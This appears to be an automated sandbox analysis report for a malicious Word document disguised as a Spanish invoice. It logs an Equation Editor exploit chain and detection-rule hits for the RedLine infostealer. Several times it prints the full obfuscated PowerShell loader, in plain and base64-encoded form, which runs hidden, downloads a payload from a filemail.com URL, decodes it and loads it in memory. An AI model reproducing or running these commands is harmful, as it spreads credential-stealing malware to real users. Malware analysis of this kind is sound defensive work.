ZABJAG4AZABlAHgAIAAtACAASwA2AHAAcwB0AGEAcgB0AEkAbgBkAGUAeAA7AEsANgBwAGIAYQBzAGUANgAnACsAJwA0AEMAbwBtAG0AYQBuAGQAIAA9ACAASwA2AHAAaQBtAGEAZwBlACcAKwAnAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoAEsANgBwAHMAdABhAHIAdABJAG4AZABlAHgALAAgAEsANgBwAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwBLADYAcABiAGEAcwBlADYANABSAGUAdgBlAHIAcwBlAGQAIAA9ACAALQBqAG8AaQBuACAAKABLADYAcABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkAC4AVABvAEMAaABhAHIAQQByAHIAJwArACcAYQB5ACgAKQAgACcAKwAnAGgATgBMACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAEsANgBwAF8AIAB9ACkAWwAtADEAJwArACcALgAuAC0AKABLADYAcABiAGEAcwBlADYANABDAG8AbQAnACsAJwBtAGEAbgBkAC4ATABlAG4AZwB0AGgAKQBdADsASwA2AHAAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAEsANgBwAGIAYQBzAGUANgA0AFIAZQB2AGUAcgAnACsAJwBzAGUAZAApADsASwA2AHAAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AH
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAgACgAIAAoAFsAUwB0AHIAaQBuAEcAXQAkAHYARQBSAEIAbwBTAGUAUAByAGUARgBFAHIAZQBOAGMAZQApAFsAMQAsADMAXQArACcAeAAnAC0AagBvAEkAbgAnACcAKQAoACgAJwBLADYAcABpAG0AYQBnAGUAVQByAGwAJwArACcAIAA9ACAAcwAnACsAJwBTAFgAaAB0AHQAcABzADoALwAnACsAJwAvADEAMAAxADcALgBmAGkAbABlAG0AYQBpAGwALgBjAG8AbQAnACsAJwAvAGEAcABpACcAKwAnAC8AZgBpAGwAZQAvAGcAZQB0AD8AZgBpAGwAZQBrAGUAeQAnACsAJwA9ADIAJwArACcAQQBhACcAKwAnAF8AYgBXAG8AOQBSAGUAdQA0ADUAdAA3AEIAVQAxAGsAVgBnAHMAZAA5ACcAKwAnAHAAVAA5AHAAJwArACcAZwBTAFMAbAB2AFMAdABHAHIAbgBUAEkAJwArACcAQwBmAEYAaABtAFQASwBqACcAKwAnADMATABDADYAUwBRAHQASQBjAE8AYwBfAFQAMwA1AHcAJgBwAGsAXwB2AGkAZAA9AGYAZAA0AGYANgAxADQAYgBiADIAMAA5AGMANgAyAGMAMQA3ADMAMAA5ADQANQAxADcANgBhADAAOQAwADQAZgAgAHMAUwBYADsASwA2AHAAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDACcAKwAnAGwAaQBlAG4AdAA7AEsANgBwAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAASwA2AHAAdwBlACcAKwAnAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhACcAKwAnAGQARABhAHQAYQAoAEsANgBwAGkAbQBhAGcAZQBVAHIAbAApADsASwA2AHAAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgASwA2AHAAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsASwA2AHAAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAcwBTAFgAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgBzAFMAWAA7AEsANgBwAGUAbgBkAEYAbABhAGcAIAA9ACAAcwAnACsAJwBTAFgAPAA8AEIAQQBTAEUANgA0AF8ARQAnACsAJwBOAEQAPgA+AHMAUwBYADsASwA2AHAAcwB0AGEAcgAnACsAJwB0AEkAbgBkAGUAeAAgAD0AIABLADYAcABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKABLADYAcABzAHQAYQByAHQARgBsAGEAZwApADsASwA2AHAAZQBuAGQASQBuAGQAZQB4ACAAPQAgAEsANgBwAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoAEsANgBwAGUAbgBkAEYAbABhAGcAKQA7AEsAJwArACcANgBwAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAASwA2AHAAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAJwArACcAIABLADYAcABzAHQAYQByAHQASQBuAGQAZQB4ADsASwA2AHAAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgAEsANgBwAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwBLADYAcABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIABLADYAcABlAG4AZABJAG4AZABlAHgAIAAtACAASwA2AHAAcwB0AGEAcgB0AEkAbgBkAGUAeAA7AEsANgBwAGIAYQBzAGUANgAnACsAJwA0AEMAbwBtAG0AYQBuAGQAIAA9ACAASwA2AHAAaQBtAGEAZwBlACcAKwAnAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoAEsANgBwAHMAdABhAHIAdABJAG4AZABlAHgALAAgAEsANgBwAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwBLADYAcABiAGEAcwBlADYANABSAGUAdgBlAHIAcwBlAGQAIAA9ACAALQBqAG8AaQBuACAAKABLADYAcABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkAC4AVABvAEMAaABhAHIAQQByAHIAJwArACcAYQB5ACgAKQAgACcAKwAnAGgATgBMACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAEsANgBwAF8AIAB9ACkAWwAtADEAJwArACcALgAuAC0AKABLADYAcABiAGEAcwBlADYANABDAG8AbQAnACsAJwBtAGEAbgBkAC4ATABlAG4AZwB0AGgAKQBdADsASwA2AHAAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAEsANgBwAGIAYQBzAGUANgA0AFIAZQB2AGUAcgAnACsAJwBzAGUAZAApADsASwA2AHAAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002DBDFC2_2_002DBDFC
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_007393489_2_00739348
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 4577
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 4577Jump to behavior
      Source: ConfirmaciXnXdeXfacturaXPedidoXadicional.doc, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
      Source: 9.2.powershell.exe.380f018.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
      Source: Process Memory Space: powershell.exe PID: 3916, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: Process Memory Space: powershell.exe PID: 4004, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@12/16@6/3
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$nfirmaciXnXdeXfacturaXPedidoXadicional.docJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR7A8B.tmpJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\gdfgcvbi.vbs"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................T.r.u.e.(.P.....T.......\.......<.......'=.........................s............(...............@...............Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ....................................u.e.(.P.....T.......\.......<.......+=.........................s............(...............(...............Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..4.....................................(.P.....T.......\................J.........................s..............4.............................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\................J.........................s............(.................4.............Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.9.5.2......J.........................s............(.......$.......(...............Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\................J.........................s............(...............(...............Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..4.....................................(.P.....T.......\................J.........................s..............4.............(...............Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\................J.........................s............(.................4.............Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..4.....................................(.P.....T.......\................J.........................s..............4.............(...............Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\................J.........................s............(.................4.............Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..4.....................................(.P.....T.......\................K.........................s..............4.............(...............Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\................K.........................s............(.................4.............Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..4.....................................(.P.....T.......\...............(K.........................s..............4.....X.......(...............Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\...............4K.........................s............(.................4.............Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....T.......\...............FK.........................s............(...............(...............Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\...............RK.........................s............(...............(...............Jump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: ConfirmaciXnXdeXfacturaXPedidoXadicional.docReversingLabs: Detection: 44%
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\gdfgcvbi.vbs"
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\gDHxsqtDodRnltJFOd.js"
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAgACgAIAAoAFsAUwB0AHIAaQBuAEcAXQAkAHYARQBSAEIAbwBTAGUAUAByAGUARgBFAHIAZQBOAGMAZQApAFsAMQAsADMAXQArACcAeAAnAC0AagBvAEkAbgAnACcAKQAoACgAJwBLADYAcABpAG0AYQBnAGUAVQByAGwAJwArACcAIAA9ACAAcwAnACsAJwBTAFgAaAB0AHQAcABzADoALwAnACsAJwAvADEAMAAxADcALgBmAGkAbABlAG0AYQBpAGwALgBjAG8AbQAnACsAJwAvAGEAcABpACcAKwAnAC8AZgBpAGwAZQAvAGcAZQB0AD8AZgBpAGwAZQBrAGUAeQAnACsAJwA9ADIAJwArACcAQQBhACcAKwAnAF8AYgBXAG8AOQBSAGUAdQA0ADUAdAA3AEIAVQAxAGsAVgBnAHMAZAA5ACcAKwAnAHAAVAA5AHAAJwArACcAZwBTAFMAbAB2AFMAdABHAHIAbgBUAEkAJwArACcAQwBmAEYAaABtAFQASwBqACcAKwAnADMATABDADYAUwBRAHQASQBjAE8AYwBfAFQAMwA1AHcAJgBwAGsAXwB2AGkAZAA9AGYAZAA0AGYANgAxADQAYgBiADIAMAA5AGMANgAyAGMAMQA3ADMAMAA5ADQANQAxADcANgBhADAAOQAwADQAZgAgAHMAUwBYADsASwA2AHAAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDACcAKwAnAGwAaQBlAG4AdAA7AEsANgBwAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAASwA2AHAAdwBlACcAKwAnAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhACcAKwAnAGQARABhAHQAYQAoAEsANgBwAGkAbQBhAGcAZQBVAHIAbAApADsASwA2AHAAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgASwA2AHAAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsASwA2AHAAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAcwBTAFgAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgBzAFMAWAA7AEsANgBwAGUAbgBkAEYAbABhAGcAIAA9ACAAcwAnACsAJwBTAFgAPAA8AEIAQQBTAEUANgA0AF8ARQAnACsAJwBOAEQAPgA+AHMAUwBYADsASwA2AHAAcwB0AGEAcgAnACsAJwB0AEkAbgBkAGUAeAAgAD0AIABLADYAcABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKABLADYAcABzAHQAYQByAHQARgBsAGEAZwApADsASwA2AHAAZQBuAGQASQBuAGQAZQB4ACAAPQAgAEsANgBwAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoAEsANgBwAGUAbgBkAEYAbABhAGcAKQA7AEsAJwArACcANgBwAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAASwA2AHAAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAJwArACcAIABLADYAcABzAHQAYQByAHQASQBuAGQAZQB4ADsASwA2AHAAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgAEsANgBwAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwBLADYAcABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIABLADYAcABlAG4AZABJAG4AZABlAHgAIAAtACAASwA2AHAAcwB0AGEAcgB0AEkAbgBkAGUAeAA7AEsANgBwAGIAYQBzAGUANgAnACsAJwA0AEMAbwBtAG0AYQBuAGQAIAA9ACAASwA2AHAAaQBtAGEAZwBlACcAKwAnAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoAEsANgBwAHMAdABhAHIAdABJAG4AZABlAHgALAAgAEsANgBwAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwBLADYAcABiAGEAcwBlADYANABSAGUAdgBlAHIAcwBlAGQAIAA9ACAALQBqAG8AaQBuACAAKABLADYAcABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkAC4AVABvAEMAaABhAHIAQQByAHIAJwArACcAYQB5ACgAKQAgACcAKwAnAGgATgBMACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAEsANgBwAF8AIAB9ACkAWwAtADEAJwArACcALgAuAC0AKABLADYAcABiAGEAcwBlADYANABDAG8AbQAnACsAJwBtAGEAbgBkAC4ATABlAG4AZwB0AGgAKQBdADsASwA2AHAAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAEsANgBwAGIAYQBzAGUANgA0AFIAZQB2AGUAcgAnACsAJwBzAGUAZAApADsASwA2AHAAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AH
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([StrinG]$vERBoSePreFEreNce)[1,3]+'x'-joIn'')(('K6pimageUrl'+' = s'+'SXhttps:/'+'/1017.filemail.com'+'/api'+'/file/get?filekey'+'=2'+'Aa'+'_bWo9Reu45t7BU1kVgsd9'+'pT9p'+'gSSlvStGrnTI'+'CfFhmTKj'+'3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f sSX;K6pwebClient = New-Object System.Net.WebC'+'lient;K6pimageBytes = K6pwe'+'bClient.Downloa'+'dData(K6pimageUrl);K6pimageText = [System.Text.Encoding]::UTF8.GetString(K6pimageBytes);K6pstartFlag = sSX<<BASE64_START>>sSX;K6pendFlag = s'+'SX<<BASE64_E'+'ND>>sSX;K6pstar'+'tIndex = K6pimageText.IndexOf(K6pstartFlag);K6pendIndex = K6pimageText.IndexOf(K6pendFlag);K'+'6pstartIndex -ge 0 -and K6pendIndex -gt'+' K6pstartIndex;K6pstartIndex += K6pstartFlag.Length;K6pbase64Length = K6pendIndex - K6pstartIndex;K6pbase6'+'4Command = K6pimage'+'Text.Substring(K6pstartIndex, K6pbase64Length);K6pbase64Reversed = -join (K6pbase64Command.ToCharArr'+'ay() '+'hNL ForEach-Object { K6p_ })[-1'+'..-(K6pbase64Com'+'mand.Length)];K6pcommandBytes = [System.Convert]::FromBase64String(K6pbase64Rever'+'sed);K6ploadedAssembly = [Sys'+'tem.Reflection.Assembly]::L'+'oad(K'+'6pcommandBytes);K6pvaiMethod = [dn'+'lib.IO.Home].GetM'+'ethod(sSXVAIsSX);K6pvaiMethod.In'+'vok'+'e(K6pnul'+'l, @(sSXtxt.LSSWS/klo/ue.hsupwsrellor.sup//:ptthsSX, sSXdesativadosSX, sSXdesativadosSX, sSXdesat'+'ivadosSX, sSXdesativ'+'adosSX, sSX1sSX, sSXOneDriveSetupsSX,sSXdesativadosSX, sSXdesativadosSX,sSXdesativadosSX'+',sSXd'+'esativadosSX,sSXdesativadosSX,sSX1sSX,sSXdes'+'ativadosSX));').rEPLAce('K6p',[StrING][ChaR]36).rEPLAce('hNL','|').rEPLAce(([ChaR]115+[ChaR]83+[ChaR]88),[StrING][ChaR]39) )"
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\gdfgcvbi.vbs" Jump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\gDHxsqtDodRnltJFOd.js" Jump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAgACgAIAAoAFsAUwB0AHIAaQBuAEcAXQAkAHYARQBSAEIAbwBTAGUAUAByAGUARgBFAHIAZQBOAGMAZQApAFsAMQAsADMAXQArACcAeAAnAC0AagBvAEkAbgAnACcAKQAoACgAJwBLADYAcABpAG0AYQBnAGUAVQByAGwAJwArACcAIAA9ACAAcwAnACsAJwBTAFgAaAB0AHQAcABzADoALwAnACsAJwAvADEAMAAxADcALgBmAGkAbABlAG0AYQBpAGwALgBjAG8AbQAnACsAJwAvAGEAcABpACcAKwAnAC8AZgBpAGwAZQAvAGcAZQB0AD8AZgBpAGwAZQBrAGUAeQAnACsAJwA9ADIAJwArACcAQQBhACcAKwAnAF8AYgBXAG8AOQBSAGUAdQA0ADUAdAA3AEIAVQAxAGsAVgBnAHMAZAA5ACcAKwAnAHAAVAA5AHAAJwArACcAZwBTAFMAbAB2AFMAdABHAHIAbgBUAEkAJwArACcAQwBmAEYAaABtAFQASwBqACcAKwAnADMATABDADYAUwBRAHQASQBjAE8AYwBfAFQAMwA1AHcAJgBwAGsAXwB2AGkAZAA9AGYAZAA0AGYANgAxADQAYgBiADIAMAA5AGMANgAyAGMAMQA3ADMAMAA5ADQANQAxADcANgBhADAAOQAwADQAZgAgAHMAUwBYADsASwA2AHAAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDACcAKwAnAGwAaQBlAG4AdAA7AEsANgBwAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAASwA2AHAAdwBlACcAKwAnAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhACcAKwAnAGQARABhAHQAYQAoAEsANgBwAGkAbQBhAGcAZQBVAHIAbAApADsASwA2AHAAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgASwA2AHAAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsASwA2AHAAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAcwBTAFgAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgBzAFMAWAA7AEsANgBwAGUAbgBkAEYAbABhAGcAIAA9ACAAcwAnACsAJwBTAFgAPAA8AEIAQQBTAEUANgA0AF8ARQAnACsAJwBOAEQAPgA+AHMAUwBYADsASwA2AHAAcwB0AGEAcgAnACsAJwB0AEkAbgBkAGUAeAAgAD0AIABLADYAcABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKABLADYAcABzAHQAYQByAHQARgBsAGEAZwApADsASwA2AHAAZQBuAGQASQBuAGQAZQB4ACAAPQAgAEsANgBwAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoAEsANgBwAGUAbgBkAEYAbABhAGcAKQA7AEsAJwArACcANgBwAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAASwA2AHAAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAJwArACcAIABLADYAcABzAHQAYQByAHQASQBuAGQAZQB4ADsASwA2AHAAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgAEsANgBwAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwBLADYAcABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIABLADYAcABlAG4AZABJAG4AZABlAHgAIAAtACAASwA2AHAAcwB0AGEAcgB0AEkAbgBkAGUAeAA7AEsANgBwAGIAYQBzAGUANgAnACsAJwA0AEMAbwBtAG0AYQBuAGQAIAA9ACAASwA2AHAAaQBtAGEAZwBlACcAKwAnAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoAEsANgBwAHMAdABhAHIAdABJAG4AZABlAHgALAAgAEsANgBwAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwBLADYAcABiAGEAcwBlADYANABSAGUAdgBlAHIAcwBlAGQAIAA9ACAALQBqAG8AaQBuACAAKABLADYAcABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkAC4AVABvAEMAaABhAHIAQQByAHIAJwArACcAYQB5ACgAKQAgACcAKwAnAGgATgBMACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAEsANgBwAF8AIAB9ACkAWwAtADEAJwArACcALgAuAC0AKABLADYAcABiAGEAcwBlADYANABDAG8AbQAnACsAJwBtAGEAbgBkAC4ATABlAG4AZwB0AGgAKQBdADsASwA2AHAAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAEsANgBwAGIAYQBzAGUANgA0AFIAZQB2AGUAcgAnACsAJwBzAGUAZAApADsASwA2AHAAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([StrinG]$vERBoSePreFEreNce)[1,3]+'x'-joIn'')(('K6pimageUrl'+' = s'+'SXhttps:/'+'/1017.filemail.com'+'/api'+'/file/get?filekey'+'=2'+'Aa'+'_bWo9Reu45t7BU1kVgsd9'+'pT9p'+'gSSlvStGrnTI'+'CfFhmTKj'+'3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f sSX;K6pwebClient = New-Object System.Net.WebC'+'lient;K6pimageBytes = K6pwe'+'bClient.Downloa'+'dData(K6pimageUrl);K6pimageText = [System.Text.Encoding]::UTF8.GetString(K6pimageBytes);K6pstartFlag = sSX<<BASE64_START>>sSX;K6pendFlag = s'+'SX<<BASE64_E'+'ND>>sSX;K6pstar'+'tIndex = 